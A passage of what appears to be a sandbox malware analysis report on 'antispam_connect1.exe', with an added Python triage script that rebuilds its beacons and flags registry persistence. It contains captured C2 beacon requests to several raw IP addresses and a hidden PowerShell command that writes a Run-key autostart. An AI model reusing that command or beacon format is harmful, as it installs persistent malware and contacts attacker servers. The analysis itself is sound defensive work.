                                             Oct 14, 2024 17:23:55.521861076 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
                                            Content-Type: text/plain; charset=utf-8
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 14 Oct 2024 15:23:55 GMT
                                            Content-Length: 18
                                            Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                            Data Ascii: Too many requests


                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                             29 | 192.168.2.5 | 50007 | 91.212.166.91 | 80 | 1900 | C:\Users\user\Desktop\antispam_connect1.exe
                                             Timestamp | Bytes transferred | Direction | Data
                                             Oct 14, 2024 17:23:55.552174091 CEST | 291 | OUT | POST / HTTP/1.1
                                            Host: 91.212.166.91
                                            User-Agent: Go-http-client/1.1
                                            Content-Length: 154
                                            X-Api-Key: jKOpQuhc
                                            Accept-Encoding: gzip
                                            Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b
                                            Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
                                             Oct 14, 2024 17:23:56.267043114 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
                                            Content-Type: text/plain; charset=utf-8
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 14 Oct 2024 15:23:56 GMT
                                            Content-Length: 18
                                            Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                            Data Ascii: Too many requests


                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                             30 | 192.168.2.5 | 50008 | 188.130.206.243 | 80 | 1900 | C:\Users\user\Desktop\antispam_connect1.exe
                                             Timestamp | Bytes transferred | Direction | Data
                                             Oct 14, 2024 17:23:56.288460016 CEST | 293 | OUT | POST / HTTP/1.1
                                            Host: 188.130.206.243
                                            User-Agent: Go-http-client/1.1
                                            Content-Length: 154
                                            X-Api-Key: rPhGbBkz
                                            Accept-Encoding: gzip
                                            Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b
                                            Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
                                             Oct 14, 2024 17:23:57.128833055 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
                                            Content-Type: text/plain; charset=utf-8
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 14 Oct 2024 15:23:57 GMT
                                            Content-Length: 18
                                            Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                            Data Ascii: Too many requests
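The sessions above are one and the same 154-byte POST body sent to five hosts, with a fresh eight-character X-Api-Key on every request and a 429 from every host; the request sizes (289 to 293 bytes) differ only by the length of the Host header. The Python below is an added example, not code from Joe Sandbox or from the sample. It rebuilds each request from the fields shown and compares it with the byte count the report recorded, groups bodies by destination, measures how much of the body is printable, and parses the powershell.exe command line from the process list further down for the CurrentVersion\Run write. The session records and the command line are transcribed from this report; the function names are this example's own, and nothing in it touches the network or the registry. One caveat on that command line: Test-Path on the registry provider checks for a key, so the guard looks for a subkey named App under Run while Set-ItemProperty writes a value named App; the condition never holds and the value is rewritten each time the sample runs.

```python
"""Triage helpers for the indicators in this report (added example, not Joe Sandbox's or
the sample's code). Rebuilds the beacon requests shown above byte for byte, checks them
against the byte counts the report recorded, groups the POST bodies by destination and
flags the Run-key persistence command line from the process list. Records are transcribed
from the report; function names are this example's own."""
import hashlib
import re

# The 154-byte POST body from the "Data Raw" line; every session sends the same bytes,
# whatever the X-Api-Key value.
PAYLOAD = bytes.fromhex(
    "18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45"
    " 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08"
    " 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31"
    " 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45"
    " 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05"
    " 06 5f 4c 1b"
)

# (session id, destination host, X-Api-Key, request bytes the report counted, body)
SESSIONS = [(sid, host, key, n, PAYLOAD) for sid, host, key, n in [
    (18, "93.185.159.253", "t3SKYf1I", 292), (19, "91.212.166.91", "8VnjTmTA", 291),
    (20, "188.130.206.243", "hxPq0fH2", 293), (21, "46.8.232.106", "bqCgchjG", 290),
    (22, "46.8.236.61", "3MeojUFr", 289), (23, "93.185.159.253", "SS3XET1Y", 292),
    (24, "91.212.166.91", "Ig3qaanA", 291), (25, "188.130.206.243", "MQtwlyZI", 293),
    (26, "46.8.232.106", "512BqIU7", 290), (27, "46.8.236.61", "WfMAsHSr", 289),
    (28, "93.185.159.253", "kBrSLuLi", 292), (29, "91.212.166.91", "jKOpQuhc", 291),
    (30, "188.130.206.243", "rPhGbBkz", 293),
]]

PRINTABLE = set(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}


def build_request(host: str, api_key: str, body: bytes) -> bytes:
    """Rebuild the request as it went on the wire, headers in the order the capture shows."""
    head = (
        "POST / HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "User-Agent: Go-http-client/1.1\r\n"
        f"Content-Length: {len(body)}\r\n"
        f"X-Api-Key: {api_key}\r\n"
        "Accept-Encoding: gzip\r\n"
        "\r\n"
    )
    return head.encode("ascii") + body


def size_mismatches(sessions=SESSIONS) -> list:
    """Session IDs whose rebuilt request length differs from the count in the report.
    Anything listed here means the capture dropped a header or truncated the body."""
    return [sid for sid, host, key, n, body in sessions
            if len(build_request(host, key, body)) != n]


def payload_fanout(sessions=SESSIONS) -> dict:
    """SHA-256 of each distinct body -> sorted hosts that received it. One digest hitting
    several hosts is the 'same check-in, several C2 candidates' pattern in this capture."""
    fanout = {}
    for _, host, _, _, body in sessions:
        fanout.setdefault(hashlib.sha256(body).hexdigest(), set()).add(host)
    return {digest: sorted(hosts) for digest, hosts in fanout.items()}


def printable_ratio(data: bytes) -> float:
    """Share of printable ASCII bytes; JSON or form data sits near 1.0, this body does not."""
    return sum(b in PRINTABLE for b in data) / len(data)


# powershell.exe command line from the process list, transcribed from the report.
PERSISTENCE_CMDLINE = (
    r'powershell -WindowStyle hidden -Command "if (-Not (Test-Path '
    r'\"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) '
    r'{ Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" '
    r'-Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }"'
)

RUN_KEY_RE = re.compile(
    r"(Set-ItemProperty|New-ItemProperty|reg(?:\.exe)?\s+add).*?"
    r"Software\\+Microsoft\\+Windows\\+CurrentVersion\\+Run",
    re.IGNORECASE,
)


def run_key_persistence(cmdline: str):
    """Return {'value_name', 'target', 'hidden_window'} when a command line writes a
    CurrentVersion\\Run value, else None. Handles the \\" escaping seen in this report."""
    if not RUN_KEY_RE.search(cmdline):
        return None
    name = re.search(r'-Name\s+\\?"([^"\\]+)', cmdline)
    value = re.search(r'-Value\s+\\?"([^"]+?)\\?"', cmdline)
    return {
        "value_name": name.group(1) if name else None,
        "target": value.group(1) if value else None,
        "hidden_window": re.search(r"-WindowStyle\s+hidden", cmdline, re.I) is not None,
    }


if __name__ == "__main__":
    print("size mismatches:", size_mismatches())
    print("fan-out:", payload_fanout())
    print(f"printable ratio: {printable_ratio(PAYLOAD):.2f}")
    print("persistence:", run_key_persistence(PERSISTENCE_CMDLINE))
```

Run it as a script to print the four checks, or import it. An empty size_mismatches() list is the sanity check that the capture shows the complete request; a single digest in payload_fanout() that maps to all five hosts is the fan-out worth a detection; a printable ratio well below 1.0 on a text/plain exchange is the hint that the body is encoded, which the report does not decode and this example does not attempt.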



                                            Target ID:0
                                            Start time:11:22:11
                                            Start date:14/10/2024
                                            Path:C:\Users\user\Desktop\antispam_connect1.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\antispam_connect1.exe"
                                            Imagebase:0xd50000
                                            File size:6'955'008 bytes
                                            MD5 hash:970C918FDDE70FD4E57C0DB74CB54BE0
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:false

                                            Target ID:2
                                            Start time:11:22:17
                                            Start date:14/10/2024
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }"
                                            Imagebase:0xef0000
                                            File size:433'152 bytes
                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:3
                                            Start time:11:22:17
                                            Start date:14/10/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6d64d0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:5
                                            Start time:11:22:28
                                            Start date:14/10/2024
                                            Path:C:\Users\user\Desktop\antispam_connect1.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\antispam_connect1.exe"
                                            Imagebase:0xd50000
                                            File size:6'955'008 bytes
                                            MD5 hash:970C918FDDE70FD4E57C0DB74CB54BE0
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:false

                                            Target ID:6
                                            Start time:11:22:33
                                            Start date:14/10/2024
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }"
                                            Imagebase:0xef0000
                                            File size:433'152 bytes
                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:7
                                            Start time:11:22:33
                                            Start date:14/10/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6d64d0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:8
                                            Start time:11:22:36
                                            Start date:14/10/2024
                                            Path:C:\Users\user\Desktop\antispam_connect1.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\antispam_connect1.exe"
                                            Imagebase:0xd50000
                                            File size:6'955'008 bytes
                                            MD5 hash:970C918FDDE70FD4E57C0DB74CB54BE0
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:false

                                            Target ID:9
                                            Start time:11:22:41
                                            Start date:14/10/2024
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Users\user\Desktop\antispam_connect1.exe\" }"
                                            Imagebase:0xef0000
                                            File size:433'152 bytes
                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:10
                                            Start time:11:22:41
                                            Start date:14/10/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff6d64d0000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true


                                              Execution Graph

                                              Execution Coverage:6.3%
                                              Dynamic/Decrypted Code Coverage:53.8%
                                              Signature Coverage:69.2%
                                              Total number of Nodes:13
                                              Total number of Limit Nodes:0
execution_graph (graph rendering not captured; recovered node list): d56137 -> d563a9 -> d563d9 (GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter) -> d563d0 -> d5613c; 36d4800 (GetPEB) -> 36d4859 -> 36d49fd (VirtualAlloc) -> 36d52e1 -> 36d530a -> 36d4a57 (VirtualAlloc) -> 36d48e0

                                              Callgraph

                                              Control-flow Graph

control_flow_graph for 36d4800-36d4dbb (graph rendering and executed/not-executed colouring not captured; recovered block summary): entry block 36d4800-36d4857 calls GetPEB; block 36d48f2-36d4a92 calls VirtualAlloc, 36d52e1, VirtualAlloc and 36d6f1c; further blocks call 36d6eac, 36d6eef and 36d6f1c; exit block 36d48e2-36d48e8
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 036D4A21
                                              • VirtualAlloc.KERNELBASE(00000000,0063F02F,00003000,00000040), ref: 036D4A89
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3372838353.00000000036D4000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D4000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_36d4000_antispam_connect1.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID: .$GetProcAddress.$l$lloc
                                              • API String ID: 4275171209-1161241244
                                              • Opcode ID: ae2d4a658cb016d9caf0d991730e99a6e299ba687abf2cc8df3dcc277493a898
                                              • Instruction ID: 8c1ef1f331a6baa5a0d08d6e842694c3929d6c32fcef4a540cd39475d49376df
                                              • Opcode Fuzzy Hash: ae2d4a658cb016d9caf0d991730e99a6e299ba687abf2cc8df3dcc277493a898
                                              • Instruction Fuzzy Hash: AA2269B1E002199FDB15CF99C984BAEBBB5FF48310F298169E905AB344DB70E941CF94

                                              Control-flow Graph

control_flow_graph for 36d68a1-36d6e2b (graph rendering and executed/not-executed colouring not captured; recovered block summary): no API calls or named sub-calls appear in the graph; exit block 36d6e25-36d6e2b
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.3372838353.00000000036D4000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D4000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_36d4000_antispam_connect1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cf64b45020a22b85927698f6973164189089b58c080edc75de3636de3a72678a
                                              • Instruction ID: fa8cbf6cce68f3fd3c87b6052050c94d18675d50393a6b5894489f83611feef5
                                              • Opcode Fuzzy Hash: cf64b45020a22b85927698f6973164189089b58c080edc75de3636de3a72678a
                                              • Instruction Fuzzy Hash: BE029132E0422A8FDF10CF7CC9806ADBBF6EB48381F514569E856DB345E674A981CB94
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2178917910.00000000048F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_48f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 487e30d5ae676ecab576b10e1ee8b574ad0cb29bb080c2e6af799fd4536d1ea0
                                              • Instruction ID: 3a09079bc36a4a7204a46d8b051120c6d2bd74e51f7e82b8351949720732fd94
                                              • Opcode Fuzzy Hash: 487e30d5ae676ecab576b10e1ee8b574ad0cb29bb080c2e6af799fd4536d1ea0
                                              • Instruction Fuzzy Hash: DE211A35B001189FDB04DFA8D99499DFBF2FF88314B26C5A5E905AB361C731ED868B90
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2178917910.00000000048F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_48f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0ede55ebd521e97603bc8a6e5dd2526c3641dee931b9098a7eb6291746af6029
                                              • Instruction ID: a24dcedbae34996af5f4ea0eb59ab074f0a876c56fbaa8be5cef33b9f20ccfc4
                                              • Opcode Fuzzy Hash: 0ede55ebd521e97603bc8a6e5dd2526c3641dee931b9098a7eb6291746af6029
                                              • Instruction Fuzzy Hash: 38B1A231A012489FCB15DF68D8409AEBBF2FF89314F1486A9E945EB362D735EC46CB50
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2178917910.00000000048F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_48f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6ea702348c833d93d06d69cefb8498f0f6710207c021d86deb9e402c5647fe60
                                              • Instruction ID: 2db0200b1ccd9926c3394acd2cca59fb2aa33df6775615ffc16ffcd71283afd2
                                              • Opcode Fuzzy Hash: 6ea702348c833d93d06d69cefb8498f0f6710207c021d86deb9e402c5647fe60
                                              • Instruction Fuzzy Hash: 29918D74A006098FCB05CF58C8949AEFBB1FF49310B288A99D955EB3A5C736FC51CB90
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2178521366.000000000475D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0475D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_475d000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: efd59f4bf98e497c9600593ceb0b2aa2f8f69b89b6ef9ceef96476838f90f52c
                                              • Instruction ID: b622af3d7de6369be3fbc0d5ff32de931b44ae39f496729a5587a596f44a8863
                                              • Opcode Fuzzy Hash: efd59f4bf98e497c9600593ceb0b2aa2f8f69b89b6ef9ceef96476838f90f52c
                                              • Instruction Fuzzy Hash: 3E018C6200D3C09FE7228B259D94652BFA8DF43224F19C4DBEC888F2A7C2A85C45C772
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2178917910.00000000048F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_48f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4db4060f3602622b19d4be717ed58548f541784f8fc69f33c0458f7dd486da56
                                              • Instruction ID: 4ec864fc356fa77acdbe5816023a88d856e5a3ae1f5a1e6c70b5112bed60f9a6
                                              • Opcode Fuzzy Hash: 4db4060f3602622b19d4be717ed58548f541784f8fc69f33c0458f7dd486da56
                                              • Instruction Fuzzy Hash: 9411E539A005089FDB04DF99D5849DDFBF2FF88314F2586A5E904A7721C731ED858B50
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2178521366.000000000475D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0475D000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_475d000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 88af44fdd9921a307ea13bde8fd70af140e034d2d304e7fbe54763e7d5657b31
                                              • Instruction ID: 8fb52697752831fef09b7b622d967ef46bb7bc3bd9aaad7d4f9a9f9a4486118f
                                              • Opcode Fuzzy Hash: 88af44fdd9921a307ea13bde8fd70af140e034d2d304e7fbe54763e7d5657b31
                                              • Instruction Fuzzy Hash: FA01F2715043449AE7308E2AED84B66FF98DF41330F18C81AEC4C0E356D2B9A842C6B1

                                              Execution Graph

                                              Execution Coverage:6.4%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:7
                                              Total number of Limit Nodes:0
execution_graph (graph rendering not captured; recovered node list): 30b4800 (GetPEB) -> 30b4859 -> 30b49fd (VirtualAlloc) -> 30b52e1 -> 30b530a -> 30b4a57 (VirtualAlloc) -> 30b48e0

                                              Callgraph

                                              Control-flow Graph

control_flow_graph for 30b4800-30b4dbb (graph rendering and executed/not-executed colouring not captured; recovered block summary): entry block 30b4800-30b4857 calls GetPEB; block 30b48f2-30b4a92 calls VirtualAlloc, 30b52e1, VirtualAlloc and 30b6f1c; further blocks call 30b6eac, 30b6eef and 30b6f1c; exit block 30b48e2-30b48e8
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 030B4A21
                                              • VirtualAlloc.KERNELBASE(00000000,0063F02F,00003000,00000040), ref: 030B4A89
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.3372407592.00000000030B4000.00000040.00001000.00020000.00000000.sdmp, Offset: 030B4000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_30b4000_antispam_connect1.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID: .$GetProcAddress.$l$lloc
                                              • API String ID: 4275171209-1161241244
                                              • Opcode ID: ae2d4a658cb016d9caf0d991730e99a6e299ba687abf2cc8df3dcc277493a898
                                              • Instruction ID: b69d2e6011ff902392b2c7d0f4f7870a6ab07b3633a57c414d4606a239f22e6e
                                              • Opcode Fuzzy Hash: ae2d4a658cb016d9caf0d991730e99a6e299ba687abf2cc8df3dcc277493a898
                                              • Instruction Fuzzy Hash: 212235B1A012199FDB14CF99C884BEEBBB5FF48314F298169E915AB341D770EA40CF94

                                              Execution Graph

                                              Execution Coverage:6.4%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:7
                                              Total number of Limit Nodes:0
execution_graph (graph rendering not captured; recovered node list): 2d84800 (GetPEB) -> 2d84859 -> 2d849fd (VirtualAlloc) -> 2d852e1 -> 2d8530a -> 2d84a57 (VirtualAlloc) -> 2d848e0

                                              Callgraph

                                              Control-flow Graph

control_flow_graph for 2d84800-2d84dbb (graph rendering and executed/not-executed colouring not captured; recovered block summary): entry block 2d84800-2d84857 calls GetPEB; block 2d848f2-2d84a92 calls VirtualAlloc, 2d852e1, VirtualAlloc and 2d86f1c; further blocks call 2d86eac, 2d86eef and 2d86f1c; exit block 2d848e2-2d848e8
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 02D84A21
                                              • VirtualAlloc.KERNELBASE(00000000,0063F02F,00003000,00000040), ref: 02D84A89
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.3372498357.0000000002D84000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D84000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_2d84000_antispam_connect1.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID: .$GetProcAddress.$l$lloc
                                              • API String ID: 4275171209-1161241244
                                              • Opcode ID: ae2d4a658cb016d9caf0d991730e99a6e299ba687abf2cc8df3dcc277493a898
                                              • Instruction ID: 4d8517fb4992cc3b353b2797a49fcb997e6d95b71363b57b3ca2b70d68710978
                                              • Opcode Fuzzy Hash: ae2d4a658cb016d9caf0d991730e99a6e299ba687abf2cc8df3dcc277493a898
                                              • Instruction Fuzzy Hash: 412249B1E0021A9FDB14DF99C884BAEBBB5FF48314F258169E915AB344E770E940CF94